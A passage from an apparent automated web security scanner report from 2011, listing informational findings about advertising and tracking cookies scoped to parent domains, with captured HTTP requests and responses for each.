The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1310503191 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_bmu3=77k%3A2zz5q%3A1; rth=2-ll8nk2-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Tue, 12 Jul 2011 20:39:51 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_bmu3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4qye=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~2zz6e~1~1-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Content-Length: 0


10.5. http://ak1.abmr.net/is/www.burstnet.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8171/99D2/&V=3-rh9n44mHYsRLbm+zoiYMT7qn+rYj+Xiz1ZIyeB%2fTJuiRaZwc2R1ZsA%3d%3d&I=364AB5B4B4DE32D&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-6D09C81E483B985A8C970170ED8A390DC9D7E844E4FADC48A5FF1F1CB4BDF136-962A4C6AE45D1257D630E27E6C9C4842CB9EEE84D8216132129E6DE75E18BFFD

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8171/99D2/?01AD=35NsWEwVsyHSe121SiR9iwgYe6LgCBL2ajyjhr10hlf28AYn5RiT8aA&01RI=364AB5B4B4DE32D&01NA=
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-FCCFE70FC078DF56F822F11184DD577711D1122C5237AE2450DD7C528764A808-B6B889F3E8363450BBEA94C78C886431A3DEBFBDA1848E28D8622FD8361BC0A3; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.6. http://ak1.abmr.net/is/www.imiclk.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.imiclk.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.imiclk.com?U=/cgi/r.cgi&V=3-qfDDCciHIXyt2Irl1Kmr5oyrkqgN%2fYy5l3G2%2f+6CedKCVse0QGcBN9hA6YEDmt2X&I=02572381EDA0358&D=www.imiclk.com&01AD=1&m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-0F09B572DEDC4E19CCE2FC3D3FB1796F8193C44ADF634733BA45870558999840-78641FCDBFB471CBB3EE6872396948E29B863DB921DCF34961B4F56AAD8BCA6C

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-6FE485614C0BA96C655D4B05A9C02B17EBF2C473C8B99D541110B62E6B105162-09F22A76A2DFA626E13613B1F948D0A8E9FF53D471AAFA67F35E933D3B3BDA13&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-ADF10014E4A43A066D5B2D3C72879A1FF451007B3D76D32FDC272F60C7891715-AC66A02713FC636745EAA11C681C5FB4381547F40591FF69D8FEF24E6B871AC5; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.7. http://ak1.abmr.net/is/www.lowes.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.lowes.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.lowes.com?U=/images/blank.gif&V=3-P%2fXkUX0BomDTWP2A4PNfzlC691C5HH5j9+allLRENBG7nSEOhAszDQ%3d%3d&I=2F94A1DBD58FE8F&D=lowes.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D5D9220AA35D8439F0F42B617821A32CA8F3F33CDE5D411FA3F6E0316F5E941D-EA3B06293D2F4D903262810809104EA0CA2B8A09EF6105BEECFACF4E76C80952

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.lowes.com/images/blank.gif?01AD=3NY-YUTTJuGK2HiDQyNEZ_pXmPlUobdy-vZgQV0lZuWVlCd7sXS36Wg&01RI=2F94A1DBD58FE8F&01NA=
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Set-Cookie: 01AI=2-2-588A1646FB542241472A8B4440942118BA09C37ACD5A2B656F23045D42DB1862-E89A6F43FA6979A9F8EEDA48EC83D287A682F51269B1357F0CA7CF6B32B6B074; expires=Wed, 11-Jul-2012 21:30:48 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.8. http://akamai.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=72A94FA79EF536BD82125331F1DA512C&rurl=4-y4KAKxbMbUW6%2fd2XlI2h7omXveorHH1wjE3YPYm1CcU78fAjlPlkmtyHROSto8g1IHztMlSiGkudhacrtA2vilpGScyJI9PpEUcqmEFv2zphJWXr%2ff8w2Y%2fyQykdVQFucM9exn2xomjGUAzUdNo8JSkUO0QrBwFBP61FHfjWIggU+CKyZPO8lg%3d%3d&V=3-xmZkZ0vxVlK+Qt0Cy0o%2fhjkSyICqOr15F%2fuz8Eau8RYdGQm+gll3R5yHYfIfaMxH HTTP/1.1
Host: akamai.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310068527; mt_mop=5:1310068391|4:1308922018|10002:1310068527

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3a 6970
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
ETag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Content-Length: 43
Expires: Tue, 12 Jul 2011 16:35:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:35:42 GMT
Connection: close
Set-Cookie: ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Set-Cookie: mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Location: http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/pod01.jpg?01RI=4D0F64FD5BE586C&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.9. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.turn.com
Path:   /r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64?rurl=4-ZoGlonpeVWkOF2PDBLGWw8jX2rf2aUXPIHvJWMiS%2fMFLEjNI3s%2f9DnATzmp95y3urXn%2fFAB%2fM1TSaBw6pqc4toFzvnQWIzORuKcqMX51pqNoIj1piOIxqohjb8%2f2MTc35k33Yetab++BMlQPEiVFOdnB4hi3nN35K8Eb4LM0krE%3d&V=3-MbpG1sgu7yHCr0MOC43F%2fUI03ub%2fbGLRcnCBrWk85VppPXUBZwjQSQ%3d%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: akamai.turn.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Content-Type: image/gif
Content-Length: 43
Expires: Tue, 12 Jul 2011 21:32:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:12 GMT
Connection: close
Set-Cookie: uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/
Location: http://www.lowes.com/images/my_store_more_info_greybox.gif?01RI=CE4893FA547B6E9&01CM=cm:akamai.turn.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.10. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2762&rnd=1310503167 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDr76b_h3npPQP5udtMJYvQm5U9oDA3gBdZLPSxRxGIef98vOqkQEJiGxICJ6WNBERCNR6ZJ6UAj0L1ghg1jxKOGPLrJaCoIheLGiVTF_hiGs4nbwIB08CEEQLiIYbIGCiuZm0us0u3Oa03feeeaZdz7vO8BtzPhvrEczSNkHOD4BckDK5z8uV2FWG7CaQkh1K6SqXBbtcrxZ9WbVO06zwVtNQcdrV69NvWqXPQxjJsNYj5eRijichdMskjztxkRfKTtHKqfg_JfLjkYwc8.wQiXI_edw6c.wvYFszOIbrPYl5EEj_J1x2YsAZiKkGXqQe0Nwoj3_54t8PyzFrGwre4nULMLVqcuShZrvj84lqvlWNN9lhu0MjGm.FvVatd.6ejov5507vV8xo21YtXlI8ACOEhkW__IUs7GLVTeJ1G8iRmfqePHNhLcXS3p7n1Je.4vELnK89heJ_fiJ6djHd5BCSnR_ic70twS.FU_rtfF014I3PXuuFZeqS_PVcD83oKBbigR8SxLQg3IfYvn9kqXFk9c2KtySXK3efrZvTkftBxca7ePue7mj7N22zab6JF8r58e87sI_BrShaw--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUcy1Eb6q7HN_gnTNnrLjvLE6pZsoDA3gBdZHNS1RhFIef8zJXHCJaGIHjRLlQZPArESeLCjfmbARB_4IRUpCRlhJmbmT6QAiSoI0VjYpaOqEIYzQtXEQLF0IgiIMIBpOQoJI6mni8zcxd3dW5933u8577Owcowrw.xGqeQKqnYHcP8ILUfvwcb8As3McKhZFgO2QaHBZ7mPUm1ZtUbzfHnl4KBbJep3od6gUd1hTBjEaw2uJIXRL.RnIsmt7vw8ReKDtA6sfgYNthO8OY6R6scDly8xGcFOTZxlAhZuYtVucscqsF_k04bNCPeRPWDP1IzTPY057_80XX_lRh5paVPUduz8DpvsPSpZrvWOcS03xzmu8kz1aGXmm.VvXatd8X9XRe2TtXHv_EvOzAunMZCWzBTirPkj.6MV_Xse6OIveWEKMzzXrJpZS7l0i7e_MZt_1FE0det_1FE79.Y7o28WxlkHLdX6o39y_.1bJxfTau7mLgomvPxbIqdWktGX7CBbjWp9c0CnhmpU4LtQVXpNjjkxLxy1U9eDAi57j0u1RoeffNPhyP2R9_arGL74NUKnu_bLOxAanWN7lxvah38LwVnAFxqaDU; Domain=.amgdgt.com; Expires=Thu, 11-Aug-2011 20:39:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:28 GMT


10.11. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=7518284&rn=934038782&c7=http%3A%2F%2Fblog.katango.com%2F&c8=Katango%20Blog%20%7C%20Trends%20and%20insights%20on%20personal%2&c9=http%3A%2F%2Fprod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 12 Jul 2011 20:46:59 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 11-Jul-2013 20:46:59 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.12. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2996&token=LOW21 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2%0A1443%3B07%2F26%2F2011%3BNETM7; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
Set-Cookie: cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/
Content-Type: image/gif
Date: Tue, 12 Jul 2011 21:30:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.13. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=47018554&bapid=9470 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=Ci4KBjc2MjcwMRi9rereJiIeRTNGMzJCRDA1QThEREY0RDU2NDZENzk2NDAwODhCEAE; ut="1%3AVZJJsoMgFEX3wtgBoqJmN4oNoiiNhmjI3j%2BN9SuZnrrn3VsUb%2FBE4PEGc3%2BaTXUaPICu%2BNnZVDUiy2xqYSI02U8H1LjPARC64OnE%2FdOmO8xF8Q3z1SUXWjUB%2BltNuAVNAOpS0t3SsMTrl1bMrmo%2FZ0JvbcDcaYbXQwSDXIoAOhGBXI7cKWlrqggy%2BMI%2BsaK4Wh7M1K6JFLyNQJR8cwrRZR%2BVVNZB4b2K49aBuHFH0%2BPRIosuuPSJrLeXq1Btx7aYMgvfg3bEcVJ2l1urc5He46aD%2BqYca%2FavyDAujeMUIf6N9YvV7f0MtBolpMKnpqv4gdsvZCU1HPkCDO8CPaqTOFA%2BJxkLeCb9CyrKkc2tHhJdiC0c4muMaMxYqOMUeQAS0Dbr2qspfAPw%2BfwB"; vsd=0@1@4e1cb118@www.imiclk.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJkoQgFETvwtoFoKL2bRQHHFAGLdSi7t4MRkfX9kW%2BnxkEb%2FDC4OcN5u4ym2o1%2BAG65FdrkapFmlpkYSI03S8H1LDPAVC2kPEi3cuiHWYi%2Fw%2Bz1SUXVtYB%2Blt1uAVNAOpW0t066o6cNrW4LmD9qPns6vZrpuxRe8KdanjVR9DLJQ%2BgFRHI5cicghpTRpDCk%2FjEiuNyeUymskjTnDcRiIJvTqG66KKCZBUU3qk4cO3pM3Cw2OIbLl0iq%2B10Fapppy2mzML3oB1xnJTt7dbqTKBn3Hgw35QRPf0pMoxDcZyi1L%2BzPqeqeV6QlYOETPjUeOdfcPuGU8EMx76AwKdAD%2BqiDhSvUcYCnkr%2FgopxbDOr%2B0TnYguH%2BBojmkxTqOMMewAS0NTr2qkxfAXw%2BfwC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:09 GMT
Set-Cookie: vsd=0@3@4e1cb129@www.imiclk.com; path=/; domain=.adbrite.com; expires=Thu, 14-Jul-2011 20:40:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.14. https://iblogin.jpmorgan.com/sso/action/federateLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iblogin.jpmorgan.com
Path:   /sso/action/federateLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmorcom.jpmorgan.com%2fIB%2fPostTrade%2fMORCOM&msg=+&securityLevel=300&ignorespnego=true&app=254651&ref=289733&cs=sYFeaoWWJKVj2jkatj0PGjSkwwc%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
